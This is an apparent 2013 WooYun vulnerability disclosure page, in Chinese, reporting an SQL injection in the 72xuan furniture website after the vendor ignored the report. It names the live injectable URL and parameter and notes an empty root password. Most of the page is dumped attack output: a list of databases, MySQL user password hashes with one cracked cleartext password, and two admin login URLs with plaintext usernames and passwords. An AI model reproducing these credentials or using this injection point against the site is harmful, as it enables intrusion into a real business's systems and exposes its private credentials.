漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-020119
漏洞标题:72xuan家居网SQL爆菊
相关厂商:72xuan家居网
漏洞作者: 范特西
提交时间:2013-03-15 20:35
修复时间:2013-06-14 10:45
公开时间:2013-06-14 10:45
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:13
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-03-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-06-14: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
无过滤导致注入
详细说明:
权6
mysql注入点
http://www.72xuan.com/cms/console/zhuantipinglun.php?pagesize=10&zhuanti_id=1
root空密码等等...
可进一步渗透。懒得了 。。
漏洞证明:
available databases [17]:
[*] 72xuan
[*] 72xuan_bbs
[*] 72xuan_cms
[*] 72xuan_count
[*] 72xuan_home
[*] 72xuan_kantugou
[*] 72xuan_new
[*] 72xuan_picture
[*] 72xuan_product
[*] 72xuan_uc
[*] 72xuan_ucenter
[*] cacti
[*] information_schema
[*] ktg_temp
[*] logs
[*] mysql
[*] test
database management system users password hashes:
[*] backup [1]:
password hash: *4DB80E3C5A30866BBB97AF9ADA6EF3425DB59EE8
[*] cacti [1]:
password hash: *59C70DA2F3E3A5BDF46B68F5C8B8F25762BCCEF0
clear-text password: passwd
[*] cms [1]:
password hash: *4DB80E3C5A30866BBB97AF9ADA6EF3425DB59EE8
[*] count [1]:
password hash: *4DB80E3C5A30866BBB97AF9ADA6EF3425DB59EE8
[*] home [1]:
password hash: *4DB80E3C5A30866BBB97AF9ADA6EF3425DB59EE8
[*] kantugou [1]:
password hash: *4DB80E3C5A30866BBB97AF9ADA6EF3425DB59EE8
[*] main [1]:
password hash: *4DB80E3C5A30866BBB97AF9ADA6EF3425DB59EE8
[*] nagios [1]:
password hash: *4DB80E3C5A30866BBB97AF9ADA6EF3425DB59EE8
[*] newuser [1]:
password hash: *4DB80E3C5A30866BBB97AF9ADA6EF3425DB59EE8
[*] picture [1]:
password hash: *4DB80E3C5A30866BBB97AF9ADA6EF3425DB59EE8
[*] product [1]:
password hash: *4DB80E3C5A30866BBB97AF9ADA6EF3425DB59EE8
[*] root [1]:
password hash: NULL
[*] uc [1]:
password hash: *4DB80E3C5A30866BBB97AF9ADA6EF3425DB59EE8
[*] uc_old [1]:
password hash: *4DB80E3C5A30866BBB97AF9ADA6EF3425DB59EE8
[*] view [1]:
password hash: *4DB80E3C5A30866BBB97AF9ADA6EF3425DB59EE8
http://admin.72xuan.com:9080/analysis/72xuan_analysis_console.jsp user:admin@72xuan.com
passwd:72xuanNB88
http://www.72xuan.com/foreground/console/xuanmana/login.jsp
user:72xuan
passwd:Dota72$manager
修复方案:
过滤,容错。
版权声明:转载请注明来源 范特西@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝